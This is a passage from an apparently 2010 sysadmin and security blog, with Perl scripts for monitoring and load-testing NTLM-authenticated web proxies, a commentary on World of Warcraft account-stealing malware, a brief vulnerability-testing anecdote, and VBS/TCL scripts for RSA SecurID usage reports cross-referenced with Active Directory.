elsif ($proxies{$_}>= 40){ $status = 'MINOR';}
elsif ($proxies{$_}>= 20){ $status = 'SLOW';}
else{$status = 'GOOD';}
$statuschk->execute($_);
my @statusline = $statuschk->fetchrow_array;

if ($status eq $statusline[1]){
if ($status eq'GOOD'){last;}
elsif ($statusline[2]==11){
$scount =1;
&Alert($_, $status);
print "ALERT $_ !\n";
}
else{
$scount= $statusline[2] +1;
}
if ($scount==1){
&Alert($_, $status);
print "ALERT $_ !\n";
}
$statusupd->execute($status,$scount,$_);
}
else{
if ($status eq'GOOD'){$scount=0;}
else{$scount=1;}
$statusupd->execute($status,$scount,$_);
&Alert($_, $status);
print "ALERT $_ !\n";
}
}

#

#This function is what the worker threads run to test their given proxy.
sub Test{
#pulls the proxy from the passed parameters, sets the target as maps.google.com because that site is set to 'private' meaning the proxy will not cache it. It then retrieves the hostname of the local machine and the login credentials, so that it can properly negotiate NTLM authentication with the proxy server
my $proxy=$_[0];
my $url="http://maps.google.com";
our $workstation = `hostname` ;
my $user=;
my $my_pass = ;

#instanatiates the LWP user agent , sets the proxy, and sets the timeout to 120 seconds, because this is the timeout used on our ISA installs
my $ua = new LWP::UserAgent(keep_alive=>1);
$ua->proxy('http', $proxy);
$ua->timeout(120);

#Creates the first request for the target website, starts the counter running and then fires off the request
my $req = HTTP::Request->new(GET => $url);
my $start = gettimeofday();
my $res = $ua->request($req);

#Sets up the data about the client to send the NTLM Authentication Negotiation Message
$client = new_client Authen::NTLM::HTTP(lm_hash($my_pass), nt_hash($my_pass),Authen::NTLM::HTTP::NTLMSSP_HTTP_PROXY, $user, , , $workstation, );

$flags = Authen::NTLM::NTLMSSP_NEGOTIATE_ALWAYS_SIGN | Authen::NTLM::NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED | Authen::NTLM::NTLMSSP_NEGOTIATE_OEM_WORKSTATION_SUPPLIED | Authen::NTLM::NTLMSSP_NEGOTIATE_NTLM | Authen::NTLM::NTLMSSP_NEGOTIATE_OEM ;
$negotiate_msg = $client->http_negotiate($flags);

#Takes the negotiation message and sets it as a header in the request and resends the request
$negotiate_msg = "Proxy-" . $negotiate_msg ;
@pa = split(/:/,$negotiate_msg);
$req->header($pa[0] => $pa[1]);
$res = $ua->request($req);

#Strips the NTLM challenge message from the response header and parses it
my $challenge_msg = "Proxy-Authenticate: " . $res->header("Proxy-Authenticate");

($domain, $flags, $nonce, $ctx_upper, $ctx_lower) = $client->http_parse_challenge($challenge_msg);

if ($domain or $ctx_upper or $ctx_lower){$placeholder=1;}

#Takes the nonce and flags from the challenge message , calculates the final authentication message, sets it as a header and sends it in the final request, recieving the originally requested page in response
$flags = Authen::NTLM::NTLMSSP_NEGOTIATE_ALWAYS_SIGN | Authen::NTLM::NTLMSSP_NEGOTIATE_NTLM | Authen::NTLM::NTLMSSP_REQUEST_TARGET;
$auth_msg = $client->http_auth($nonce, $flags);

@pa = split(/:/,$auth_msg);
$req->header($pa[0] => $pa[1]);
$res = $ua->request($req);

#Stops the timer, calculates the elapsed time rounding to the nearest hudnredth of a second and returns that value to the main thread
my $end = gettimeofday();
my $delta = ($end - $start);
$delta= nearest(.01,$delta);
print "Finished getting $url through $proxy in $delta seconds! \n";
return $delta;

}

#This function actually handles the generation of the email alert for a status change. Depending on the status it picks from different wordings in the email subject and message.
sub Alert{
my $proxy = $_[0];
my $status=$_[1];

if ($status eq 'GOOD'){
$subject="Subject: $proxy has returned to Normal Operation";
$message = "The ProxyHealth Monitor has detected that proxy $proxy has returned to a 'GOOD' status and is retrieving pages within an acceptable timeframe.";
}
elsif ($status eq 'SLOW'){
$subject="Subject: $proxy is experiecing delay";
$message="The ProxyHealth Monitor has detected that the proxy $proxy is experiencing slowness in processing web requests. The system will continue to monitor and will send an update when the status changes.";
}
elsif($status eq 'MINOR'){
$subject="Subject: $proxy is experiencing a Performance Problem";
$message="The ProxyHealth Monitor has detected that the proxy $proxy is suffering noticeable slowness in processing web requests. It's current status is rated as 'MINOR'. The system will continue to monitor and will send an update when the status changes.";
}
elsif($status eq 'MAJOR'){
$subject="Subject: $proxy is experiencing a Major Performance Problem";
$message="The ProxyHealth Monitor has detected that the proxy $proxy is suffering serious slowness in processing web requests. It's current status is rated as 'MAJOR'. The system will continue to monitor and will send an update when the status changes.";
}
elsif($status eq 'CRITICAL'){
$subject="Subject: $proxy is experiencing a Critical Performance Problem";
$message="The ProxyHealth Monitor has detected that the proxy $proxy is facing a 'CRITICAL' performance decrease. Web traffic throguh this proxy will be extremely slow. The system will continue to monitor and will send an update when the status changes.";
}
elsif($status eq 'DOWN'){
$subject="Subject: $proxy is DOWN!";
$message="The ProxyHealth Monitor has detected that traffic through $proxy is exceeding the timeout limit of 2 minutes. This has led to the system declaring the proxy as being 'DOWN'. Web requests through this proxy will FAIL due to timeout. The system will continue to monitor and will send an update when the status changes.";
}

my $mailer= Net::SMTP->new(, Hello=> );
$mailer->mail();
$mailer->to();
$mailer->data();
#Sets the UK and US Security Team Distribution lists as the Recipients
$mailer->datasend('To: , ');
$mailer->datasend("\n");
$mailer->datasend('Return-Path:');
$mailer->datasend("\n");
#Sets a header that will tell the mail client that replies are to go to the Security Distribution lists and not back to the fake address used to send the alert.
$mailer->datasend('Reply-To:, ');
$mailer->datasend("\n");
$mailer->datasend('FROM:');
$mailer->datasend("\n");
#Sets the message importance to high
$mailer->datasend('Importance: High');
$mailer->datasend("\n");
$mailer->datasend($subject);
$mailer->datasend("\n\n");
$mailer->datasend($message);
$mailer->dataend();
$mailer->quit;

}

LWP and NTLM Proxy Authentication

2010-03-05T13:14:00.000-08:00

During the course of my duties, I had a need to load test some proxy servers. To do this, we decided to use ISA logs as sources for test traffic. so the objective was seemingly simple, write a quick LWP script that parses an ISA log for urls, then goes and tries to retrieve them through the target proxy. Oh and , of course, make it multi-threaded so we can send tons and tons of traffic at a time. Where it gets a little more complicated is this: the proxies in question all use NTLM Authentication. I wasn't discouraged, at first, but soon discovered that I could not find anyone who had managed to make LWP work with an NTLM proxy. Sure, I could have kludged it together with something like CNTLM, but that didn't feel right, and didn't provide for solid re usability.

Fortunately, I did find Yee Man Chan's Authen::NTLM Module which I was able to appropriately adapt to my purposes.It is important to not that this Yee Man Chan's module not the one with the same namespace . You can tell which is which by the version numbers. Anyways, the script I wrote takes a proxy address, an isa log file and a number of threads as arguments, and proceeds to slam said proxy into oblivion. Here it is.Please feel free to leave comments and/or feedback.

-------------------------------------code-------------------------------------------------------------

#!/usr/bin/perl

use threads;
use Thread::queue;
use LWP;
use LWP::UserAgent;
use HTTP::Request;
use Authen::NTLM(nt_hash, lm_hash);
use Authen::NTLM::HTTP;

#Checks to ensure the user has invoked the script correctly
unless(scalar(@ARGV) ==3){
print "Proper usage is proxytest.pl <# of threads> \n";
print "Proxy must be entered as http://: or http://:\n ";
exit;
}

#Begin instantiating our queues
our $users = new Thread::Queue;
our $urls = new Thread::Queue;

#Takes the apssed parameters and sets them. This is the ISA log file being parsed for test URLS, the number of threads to use in testing, and the proxy being tested
my $logfile = $ARGV[0];
my $numthreads = $ARGV[1];
my $proxy = $ARGV[2];

#Collect the hostname for the local machine, this is important for the NTLM Negotiation that will be happening later
our $workstation = `hostname` ;
our $placeholder = 0;

#Verifies that the proxy was entered in the correct format
unless ($proxy=~/^http:\/\/[A-Za-z0-9\.]+:\d+$/){
print "Proxy must be entered as http://: or http://:\n ";
exit;
}

#Enqueues the test accounts to use
$users->enqueue();

#Reads through the supplied log file, and collects all of the URLs and enqueues them for the worker threads to use
open ISALOG, "<$logfile";

while (){
chomp;
if($_=~/\banonymous\b/i){next;}
if($_=~/\bhttp:\/\/\S+\b/i){$urls->enqueue($&);}
}

close ISALOG;
print "\n Done Reading Log! \n\n";

#Instantiates a number of worker threads based on the parameter passed when invoking the script
for($tcount=1; $tcount<=$numthreads;$tcount++){
$thrs[$tcount]= threads->create(\&printoff, $tcount );
}
#Sets blockings joins for each one of these asynchronous worker threads
for($tcount=1; $tcount<=$numthreads;$tcount++){
$thrs[$tcount]->join;
}

#foreach(@thrs){$_->join;}

#The meat and potatoes
sub printoff{
#Dequeues a URL and username to use. It then re-enqueues the username, sticking back at the end of the Queue to be used over again
my $tid = $_[0];
my $url = $urls->dequeue_nb;
my $user = $users->dequeue;
$users->enqueue($user);

#While it had a valid URL, it will perform the below tests
while ($url){

#Password is set here. This password is static for all of the used test accounts
my $my_pass = ;

#Creates the LWP User Agent, tells it to use the supplied proxy, and sends the initial HTTP GET request for the supplied URL and takes in a response
my $ua = new LWP::UserAgent(keep_alive=>1);
$ua->proxy('http', $proxy);
$ua->timeout(30);
my $req = HTTP::Request->new(GET => $url);
my $res = $ua->request($req);

#Once the initial request has been sent out, the proxy will send back an NTLM negotiate message
#We set up the NTLM authentication client response by passing ntlm hashes of the username, password, domain, and workstation hostname
$client = new_client Authen::NTLM::HTTP(lm_hash($my_pass), nt_hash($my_pass),Authen::NTLM::HTTP::NTLMSSP_HTTP_PROXY, $user, , , $workstation, );
#Here we set the NTLM protocol flags that we wish to be accepted
$flags = Authen::NTLM::NTLMSSP_NEGOTIATE_ALWAYS_SIGN | Authen::NTLM::NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED | Authen::NTLM::NTLMSSP_NEGOTIATE_OEM_WORKSTATION_SUPPLIED | Authen::NTLM::NTLMSSP_NEGOTIATE_NTLM | Authen::NTLM::NTLMSSP_NEGOTIATE_OEM ;

#We then take the client data, and the flags and jam them into a header, and add it back to the original request, and resend it.
$negotiate_msg = $client->http_negotiate($flags);

$negotiate_msg = "Proxy-" . $negotiate_msg ;
@pa = split(/:/,$negotiate_msg);

$req->header($pa[0] => $pa[1]);
#The proxy then sends back an NTLM challenge response, which we strip from the message and parse using the NTLM methods provided by the module
$res = $ua->request($req);

my $challenge_msg = "Proxy-Authenticate: " . $res->header("Proxy-Authenticate");

($domain, $flags, $nonce, $ctx_upper, $ctx_lower) = $client->http_parse_challenge($challenge_msg);
#Kludged together fix. for some reason it generates errors if you do not do this. Possibly an oddity about the way we are using the NTLM module
if ($domain or $ctx_upper or $ctx_lower){$placeholder=1;}

#We set the next round of flags, take the Nonce which we gained from parsing the challenge message, and send back a final authentication message. Once the proxy recieves this, it processes the original GET request
$flags = Authen::NTLM::NTLMSSP_NEGOTIATE_ALWAYS_SIGN | Authen::NTLM::NTLMSSP_NEGOTIATE_NTLM | Authen::NTLM::NTLMSSP_REQUEST_TARGET;
$auth_msg = $client->http_auth($nonce, $flags);

@pa = split(/:/,$auth_msg);
$req->header($pa[0] => $pa[1]);
$res = $ua->request($req);
print "Finished getting $url \n";
#my $bytes = length $res->content;
#print " $url was $bytes bytes \n";
#print $res->code;
#print "\n\n" . $res->content;
#We then dequeue the next URL and continue on until there are no more URLs. The worker thread will then attempt to join. when all worker threads have joined, the code exits.
$url = $urls->dequeue_nb;

}

}

Defrauding the fantasy economy

2010-03-04T11:56:00.000-08:00

There is an interesting story developing, about World of Warcraft account fraud. The original articles I found are over at Sunbelt Software and El Reg. Apparently, the latest round of WoW account hacks is using malware that intercepts the multi-factor authentication credentials, transmits them to a MitM server, and replays a failed login to the user. Meanwhile the MitM box replays the login data to the WoW authentication servers, and promptly empties their characters of their hard farmed gold. I would imagine that by the time the user successfully logged in, their characters would all be broke.

I feel that there are a couple of important take-aways from this story. The first, is one that plenty of other people have been saying for a long time now. The fraudsters are getting better. They are smart, they are dedicated, and they are engaged in an arms race with the Security Industry. It raises serious concerns over our ability to stay on top of this arms race. Along those lines is the second point. This is nothing new either, but the end users are the weakest link. Yes, from a technical perspective the vector is a Trojan. Realistically though, it's a social engineering attack. The initial con where you get the user to download and install the new "add-on". Both sides of this attack vector are hard to stay on top of. Firstly, malware authors are very good at creating variants to escape AV definitions, so AV alone cannot be relied upon. Secondly, how do you make sure users don't fall for these traps. Many would-be pundits will say it is the fault of "stupid users". In some cases this may be accurate, but let's be honest here, fraudsters have gotten VERY good at social engineering.

This is probably the biggest lesson of the over-hyped Aurora incident. Social Engineering can hit anyone. Users at google may not have had any reason to doubt the authenticity of the emails they received. They had no way to sense the malignant payload carried in those innocent looking PDFs. Sure, intellectually we all know PDFs can have bad things in them. We also knew as kids that some people put razor blades in candy apples. I don't think most people tear apart their fruit before they eat it. Especially if it's someone they trust handing it to them. So how were these WoW users to know that this add-on was no good. There are known 'safe' repositories of add-on, you will undoubtedly say. We have seen how much of a fallacy even that can be. There is no reliable system of trust on the internet. It's a best guess effort. You might check around the forums to see if other people say anything about the add-on. You might do a google-search for the add-on and see what comes up, or even ask people in the game about it. If you're particularly in the know, you might even check the sites hosting it against something along the lines of Mcafee's Site Adviser . What do you do if all of these come up dry? Chances are, you're going to take a chance and install it. Conventional wisdom says, if you notice anything strange during the install, then you panic, remove it, and run an anti-virus. Malware authors are not so sloppy as to make it obvious anymore, though. So now you have installed software that, as far as you can tell, is exactly what it says it is. By the time you might realize you were wrong, it's already too late

So the question becomes, how do we fight this attack vector? There is no silver bullet answer. It is still just a best effort game. So we rely on the things that we know help protect us. We use only known trusted sources. We do some research on software before we install it. We might check Site Adviser, or upload the binary to Virus Total . We make sure our anti-virus is up to date, and our boxes are patched. Every once and a while, we may still get nailed.

There is a third take-away point in all of this, that I'd like to discuss briefly. This is perhaps the most bizarre piece of this. We have seen these sort of things all before. Spend a month reading the security blogs and new sites out there, and you'll be flooded with plenty of stories about targeted malware, and banking trojans. You'll see reports of botnets that stole millions of logins. What is truly strange about this particular case, at least to me, is the target. Remember that we are talking about World of Warcraft here, a video game. We are seeing the same amount of effort put into stealing video game logins as the people who break into bank accounts. People are breaking into a virtual world, committing fantasy identity theft, and using it to empty imaginary bank accounts of money that doesn't exist and cannot be sued outside of the confines of this imaginary world. And yet, they take this imaginary money, and they turn it into real money. It is all well rooted in the theory of supply and demand, I suppose. I, however, cannot shake the sensation that this is truly a strange situation we find ourselves in. It's rather like if we were playing a game of monopoly, and when you weren't looking I stole some of your play money. I then turn around and sell that play money to another player for $100. Is it just me, or does anyone else find this to be insane?

Lessons Learned: Self-referencing local file includes...

2010-03-03T14:17:00.000-08:00

So I had a small incident at work today. I found a perl cgi script that had a local file include/os command injection vulnerability on it. After confirming this vulnerability, i decided to try and pull the source code for the vulnerable script, and the system choked. When I went to try something else, I was greeted by an ugly apache 500 server error. At first I just frowned and went back to a command string I had already validated worked. 500 error again. apparently somewhere in the mix, I am unsure if it is apache itself, mod_perl, or a condition created on the OS level, did not like the script trying to read itself and return it back out through apache. I suppose you could class this as an inadvertent denial of service attack

Scripting Binge

2010-02-25T12:29:00.000-08:00

I'm going through some of my old scripts today, and thought I would share some of the things I've come up with over the next few days. Today I have posted a pair of SecurID reporting scripts I wrote a while back, so check those posts out. tomorrow i'll be talking about some Perl scripts designed to do testing and monitoring of web proxy servers. Stay tuned!

RSA SecurID Monthly Successful Authentication Script

2010-02-25T12:24:00.000-08:00

Here's another fun SecurID Script

This is one that is run directly on your ACE Server. It has two parts, one is a TCL script that directly accesses the API on the box. The contents of that TCL script look like this:

------------------------------------------------------------------------------
puts [Sd_ApiInit "" "" 1]
# SQL using Dynamic Select to print out the last login dates for all tokens.
set line 0
set startdate 0
set enddate 0

set startdate [lindex $argv 0]
set enddate [lindex $argv 1]

puts $startdate
puts $enddate

set line [Sd_DynamicSelect auths.csv 0 0 0 0 "" "" "SELECT chUserName,chLogin,dtGMTDate,tGMTTOD,chClientName FROM SDLogEntry WHERE dtGMTDate >=$startdate AND dtGMTDate <=$enddate AND iMessageNum=1011 ORDER by dtGMTDate,chClientName,chLogin" ]
puts $line
puts "Report Complete"

Sd_ApiEnd
exit

---------------------------------------------------------------------------------------------------------

The second part is another VBS script. This one takes some arguments. It can either take a start date and end date as arguments, or you can pass it 'auto' as a sole parameter and it will use the system date on the box to determine the current month, and get last month's data. The VBS script then executes the TCL script, and generates an output on all the successful authentications for the month. Then using very similar tricks to the previous post, this script parses that data and XREFs it with our Active Directory structure. It compresses the data down so what we have is a report on successful authentications by Day, by Agent Host, and finally by User, with a number of successful auths for each. So for example, if during the course of a day I log in via Citrix 3 times, and by vpn twice. There would be two records for my username on that day.

Once it has compiled that report, it then assembles it into a nice little Pivot chart for easy manipulation of the data. This allows you to filter the data based on a number of factors such as location or department. Finally, it emails the report off and cleans up after itself, deleting all the interim reports it generated. The VBS script looks like this:

-----------------------------------------------------------------------------------------------------

On Error Resume Next

If Wscript.Arguments.Item(0) = "auto" Then

intLastMonth = (month(Date) -1)

strMonth = CStr(intLastMonth)

if Len(strMonth) =1 Then

strMonth= "0" & strMonth

end if

If strMonth = "01" or strMonth = "03" or strMonth = "05" or strMonth = "07" or strMonth = "08" or strMonth = "10" or strMonth = "12" Then

strEndMonth = "31"
elseif strMonth = "02" Then
strEndMonth = "28"

else

strEndMonth = "30"

end if

strYear = CStr(Year(Date))

startdate = strMonth & ".01." & strYear

enddate = strMonth & "." & strEndMonth & "." & strYear

email=true

else

startdate = Wscript.Arguments.Item(0)

enddate = Wscript.Arguments.Item(1)

email=false

end if

set objShell = wscript.createObject("wscript.shell")

iReturn = objShell.Run("D:\Ace\utils\tcl\BIN\tcl-sd month_auths.tcl " & startdate & " " & enddate)

Wscript.sleep 10000

Set objFS =CreateObject("Scripting.FileSystemObject")

set objReportIn = objFS.OpenTextfile("auths.csv")

set objReportOut = objFS.OpenTextfile("AUTH_Report.csv",2, TRUE)

Wscript.Echo "Parsing Report..."

objReportIn.Readline

arrayLine = split(objReportIn.Readline, ",")

user1 = arrayLine(1)

name = arrayLine(0)

adate = arrayLine(2)

agent = arrayLine(4)

userCount = 1

objReportOut.WriteLine("Date,Login,Propper_Name,Num_Auths,Agent_Host,Country,Office,Company,Department,Is_IT")

do until objReportIn.AtEndOfStream

Set objUsers = CreateObject("Scripting.Dictionary")

arrayLine = split(objReportIn.Readline, ",")

If arrayLine(1) <> user1 then

user1= replace(user1,Chr(34),"")

name = replace(name,Chr(34),"")

user1 = replace(user1,","," ")

name= replace(name,","," ")

If objUsers.Exists(user1)=False then

objUsers.Add user1, Query(user1)

end if

if objUsers(user1).Exists("Abort") then

country="N/A"

office="N/A"

company="N/A"

department="N/A"

isIT="N/A"

else

country = objUsers.Item(user1).Item("Country")

office = objUsers.Item(user1).Item("Office")

company = objUsers.Item(user1).Item("Company")

department = objUsers.Item(user1).Item("Department")

isIT = objUsers.Item(user1).Item("IsIT")

end if

objReportOut.WriteLine(adate & "," & user1 & "," & name & "," & userCount & "," & agent & "," & country & "," & office & "," & company & "," & department & "," & isIT)

user1 = arrayLine(1)

name = arrayLine(0)

adate = arrayLine(2)

agent = arrayLine(4)

userCount = 1

else

userCount = userCount +1

end if

loop

objReportIn.close

objReportOut.Close

CreatePivot

if email=true then

SendReport

end if

Set objReport1 = objFS.GetFile("D:\Ace\utils\tcl\BIN\Auths\auths.csv")

Set objReport2 = objFS.GetFile("D:\Ace\utils\tcl\BIN\Auths\Auth_Report.csv")

Set objFinal= objFS.GetFile("D:\Ace\utils\tcl\BIN\Auths\RSA_Auth_Report.xls")

objReport1.Delete

objReport2.Delete

objFinal.Delete

Wscript.Echo "Done"

Function CreatePivot

Wscript.echo "creating pivottable"

Set objXRep=CreateObject("Excel.Application")

'objXRep.visible=true

objXrep.Workbooks.open "D:\Ace\utils\tcl\BIN\Auths\AUTH_Report.csv" , true , true

Set mySheet = objXRep.ActiveWorkbook.Worksheets(1)

Dim topBot

topBot=Split(mySheet.UsedRange.Address,":")

'Wscript.echo topBot(1)

Set myWorkbook=mySheet.Parent

newName="AuthPivot"

Set myCache=myWorkbook.PivotCaches.Add(1,"'" & mySheet.Name & "'!A1:" & topBot(1))

Set myTable=myCache.CreatePivotTable("", newName,TRUE, -1)

Set pivotSheet = myTable.Parent

pivotSheet.Name=newName

With myTable.PivotFields("Is_IT")

.Orientation = 3

End With

With myTable.PivotFields("Country")

.Orientation = 3

End With

With myTable.PivotFields("Office")

.Orientation = 3

End With

With myTable.PivotFields("Department")

.Orientation = 3

End With

With myTable.PivotFields("Company")

.Orientation = 3

End With

With myTable.PivotFields("Date")

.Orientation = 1

.Position = 1

End With

With myTable.PivotFields("Agent_Host")

.Orientation = 2

.Position = 1

End With

myTable.AddDataField myTable.PivotFields("Num_Auths"), "Successful Authentications", -4157

With myTable

.ColumnGrand = TRUE

.RowGrand = TRUE

End With

topBot=Split(pivotSheet.UsedRange.Address,":")

Dim col,cols

cols = Split(topBot(1),"$")

col=cols(1)

row = cols(2)

With pivotSheet.Range("B8:" & col & row)

.Interior.ColorIndex = 50

With .Borders(7)

.LineStyle = 1

.Weight = 2

.ColorIndex = -4105

End With

With .Borders(8)

.LineStyle = 1

.Weight = 2

.ColorIndex = -4105

End With

With .Borders(9)

.LineStyle = 1

.Weight = 2

.ColorIndex = -4105

End With

With .Borders(10)

.LineStyle = 1

.Weight = 2

.ColorIndex = -4105

End With

With .Borders(11)

.LineStyle = 1

.Weight = 2

.ColorIndex = -4105

End With

With pivotSheet.Range("B8:" & col & "8")

.HorizontalAlignment = 1

.VerticalAlignment = -4107

.WrapText = False

.Orientation = 45

.AddIndent = False

.IndentLevel = 0

.ShrinkToFit = False

.ReadingOrder = -5002

.MergeCells = False

.Font.Bold = TRUE

.Interior.ColorIndex = 37

' Fit here - before putting in borders

pivotSheet.Columns("A:" & col).AutoFit

End With

With pivotSheet.Range("A9:A" & (row-1))

.Interior.ColorIndex = 37

End With

With pivotSheet.Range( col & row & ":" & col & row)

.Font.Bold = TRUE

End With

With pivotSheet.Range("A9:A" & row)

.Font.Bold = TRUE

End With

With pivotSheet.Range("A" & row & ":" & col & row)

.Interior.ColorIndex = 44

End With

With pivotSheet.Range(col & "9:" & col & row)

.Interior.ColorIndex = 44

End With

Wscript.echo "Saving..."

objXRep.DisplayAlerts = False

objXRep.Workbooks(1).SaveAs "D:\Ace\utils\tcl\BIN\Auths\RSA_Auth_Report.xls", -4143

objXRep.Workbooks(1).Close

set mySheet = nothing

objXRep.Quit

Set objXRep= Nothing

End Function

Function SendReport

strFrom =

strTo =

strSub = Date & " - " & ": Monthly Authentication Report"

strSMTP =

strBody = "Attached is the Monthly RSA SecurID Authentication Report."

strAttachment = Replace(WScript.ScriptFullName, WScript.ScriptName, "RSA_Auth_Report.xls")

set objEmail = CreateObject("CDO.Message")

objEmail.From = strFrom

objEmail.To = strTo

objEmail.Subject = strSub

objEmail.Textbody = strBody

objEmail.AddAttachment(strAttachment)

objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2

objEmail.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = strSMTP

objEmail.Configuration.Fields.Update

objEmail.Send

Set ObjFS = CreateObject("Scripting.FilesystemObject")

'objFS.Deletefile "auths.csv"

'objFS.Deletefile "Auth_Report.csv"

End function

Function Query (strUser)

Set rs = CreateObject("adodb.recordset")

Connstring = "Provider=ADsDSOObject"

strSQL = "SELECT distinguishedName,physicalDeliveryOfficeName,Company,Department,extensionAttribute7 FROM 'LDAP://dc=int,dc=dir,dc=willis,dc=com' WHERE objectCategory='user' AND sAMAccountName='" & strUser & "'"

rs.Open strSQL, Connstring

Set objUser = CreateObject("Scripting.Dictionary")

if not rs.eof and not rs.bof Then

objUser.Add "Login" , strUser

strDN= rs("distinguishedName")

set regExDN = New RegExp

regExDN.Pattern = "OU=iTrash"

regExDN.Global = True

regExDN.IgnoreCase = True

If regExDN.Test(strDN)=TRUE then

CountryOU= "iTrash"

Else

regExDN.Pattern = "OU=\w+,OU=iResources"

Set OUMatch= regExDN.Execute(strDN)

strOU = OUMatch.Item(0).Value

regExDN.Pattern = ",OU=iResources"

strOU = RegExDN.Replace(strOU,"")

regExDN.Pattern = "OU="

strOU = RegExDN.Replace(strOU,"")

CountryOU= strOU

end if

company = rs("Company").Value

department = rs("Department").Value

office = rs("physicalDeliveryOfficeName").Value

office = replace(office,","," ")

company = replace(company,","," ")

department = replace(department,","," ")

objUser.Add "Country" , CountryOU

objUser.Add "Office" , office

objUser.Add "Company", company

objUser.Add "Department", department

If (rs("extensionAttribute7")="Information Technology") then

objUser.Add "IsIT", "TRUE"

else

objUser.Add "IsIT", "FALSE"

end if

Set Query= objUser

Else

Wscript.echo "Username " & strUser & " not found"

objUser.Add "Abort", "Username not found"

Set Query= objUser

End if

End Function

---------------------------------------------------------------------------------

Again, there are some highly specific things built in here, but you could easily change these to suit your needs. Also, it is heavily dependent on Excel to work. I have this setup on our primary ACE server as a monthly job that runs so I can get usage data at the end of each month.

RSA SecurID - Active Directory Cross-Reference Script

2010-02-25T12:04:00.000-08:00

Well, I'm not starting out with one of the big planned posts after all. I decided to start out with a couple of posts on some old work I've done. I had found myself spending a lot of times running reports out of our SecurID system, and there were a lot of requests along the lines of "Show me all the people in office X that have an active SecurID". The solution I came up with is a two step process.

Step 1: Run the initial query in the RSA Ace Administration console
I wrote a query to show me specific details out of the server about all users with enabled tokens, including the date the token expires and the date and time they last logged in. That query looks like this:

SELECT chDefaultLogin,chLastName,chFirstName,chSerialNum,iType,dateDeath,dateLastLogin,todLastLogin from SDUser JOIN SDToken on SDUser.iUserNum=SDToken.iUserNum WHERE SDToken.bEnabled=TRUE

It is then set to output to CSV with CSV headers. I save mine to a pre-defined location on my c-drive, the script below could be altered for any location, or could easily be altered to do a dynamic location. I just never got around to making that enhancement

Step 2: Run the VBS script. When the file open dialog appears, select the CSV file RSA output. It will then process the CSV file, making calls to the local Domain Controller to lookup each user and retrieve their data. The script still has some kinks in it that I haven't gotten around to fixing but it works pretty well for what we need. The script looks like this:

---------------------------------------------------------------------------------------------------------

On Error Resume Next

strDistName=""

Set ObjFSO = CreateObject("UserAccounts.CommonDialog")

ObjFSO.Filter = "Comma-Seperated Values|*.csv|Excel Spreadsheets|*.xls|All Files|*.*"

ObjFSO.InitialDir = "c:\"

InitFSO = ObjFSO.ShowOpen

If InitFSO = False Then

Wscript.Echo "Script Error: Please select a file!"

Wscript.Quit

end if

Wscript.Echo "Querying Report...."

Set objXRep=CreateObject("Excel.Application")

objXrep.Workbooks.open ObjFSO.FileName , true, true

Set currentworksheet = objXRep.ActiveWorkbook.Worksheets(1)

usedColumnsCount = currentWorkSheet.UsedRange.Columns.Count

usedRowsCount = currentWorkSheet.UsedRange.Rows.Count

Set Cells = currentWorksheet.Cells

Cells(1,9).Value="Country_Ou"

Cells(1,10).Value="Office"

Cells(1,11).Value="Comapany"

Cells(1,12).Value="Department"

Cells(1,13).Value="Status"

Cells(1,14).Value="IS_IT?"

Cells(1,15).Value="Email"

Cells(1,16).Value="DN"

Set objUsers = CreateObject("Scripting.Dictionary")

For intCellCount=2 to usedRowsCount

user1 = Cells(intCellCount,1).value

If objUsers.Exists(user1)=False then

objUsers.Add user1, Query(user1)

end if

if objUsers(user1).Exists("Abort") then

country="N/A"

office="N/A"

company="N/A"

department="N/A"

isIT="N/A"

status="N/A"

email="N/A"

else

country = objUsers.Item(user1).Item("Country")

office = objUsers.Item(user1).Item("Office")

company = objUsers.Item(user1).Item("Company")

department = objUsers.Item(user1).Item("Department")

isIT = objUsers.Item(user1).Item("IsIT")

status = objUsers.Item(user1).Item("Status")

email= objUsers.Item(user1).Item("Email")

strDN=onjUsers.Item(user1).Item("DN")

end if

Cells(intCellCount,9).Value=country

Cells(intCellCount,10).Value=office

Cells(intCellCount,11).Value=company

Cells(intCellCount,12).Value=Department

Cells(intCellCount,13).Value=Status

Cells(intCellCount,14).Value=isIT

Cells(intCellCount,15).Value=email

Cells(intCellCount,16).Value=strDN

Wscript.Echo "closing down.."

objXRep.DisplayAlerts = False

objXRep.Workbooks(1).SaveAs "C:\dat\RSA_Token_Report.xls", -4143

objXRep.workbooks(1).Close

Set currentWorkSheet = Nothing

objXRep.Quit

Set objXRep= Nothing

Wscript.echo "Done!"

Function Query (strUser)

Set rs = CreateObject("adodb.recordset")

Connstring = "Provider=ADsDSOObject"

strSQL = "SELECT distinguishedName,physicalDeliveryOfficeName,Company,Department,extensionAttribute7,mail,userAccountControl FROM 'LDAP://dc=int,dc=dir,dc=willis,dc=com' WHERE objectCategory='user' AND sAMAccountName='" & strUser & "'"

rs.Open strSQL, Connstring

Set objUser = CreateObject("Scripting.Dictionary")

if not rs.eof and not rs.bof Then

objUser.Add "Login" , strUser

strDN= rs("distinguishedName")

set regExDN = New RegExp

regExDN.Pattern = "OU=iTrash"

regExDN.Global = True

regExDN.IgnoreCase = True

If regExDN.Test(strDN)=TRUE then

CountryOU= "iTrash"

Else

regExDN.Pattern = "OU=\w+,OU=iResources"

Set OUMatch= regExDN.Execute(strDN)

strOU = OUMatch.Item(0).Value

regExDN.Pattern = ",OU=iResources"

strOU = RegExDN.Replace(strOU,"")

regExDN.Pattern = "OU="

strOU = RegExDN.Replace(strOU,"")

CountryOU= strOU

end if

company = rs("Company").Value

department = rs("Department").Value

office = rs("physicalDeliveryOfficeName").Value

office = replace(office,","," ")

company = replace(company,","," ")

department = replace(department,","," ")

UAC= rs("userAccountControl").Value

mail = rs("mail").Value

If UAC=514 then

objUser.Add "Status", "Disabled"

Else

objUser.Add "Status", "Enabled"

End if

objUser.Add "DN", strDN

objUser.Add "Email", mail

objUser.Add "Country" , CountryOU

objUser.Add "Office" , office

objUser.Add "Company", company

objUser.Add "Department", department

If (rs("extensionAttribute7")="Information Technology") then

objUser.Add "IsIT", "TRUE"

else

objUser.Add "IsIT", "FALSE"

end if

Set Query= objUser

Else

'Wscript.echo "Username not found"

objUser.Add "Abort", "Username not found"

Set Query= objUser

End if

End Function

-----------------------------------------------------------------------------------------------------------

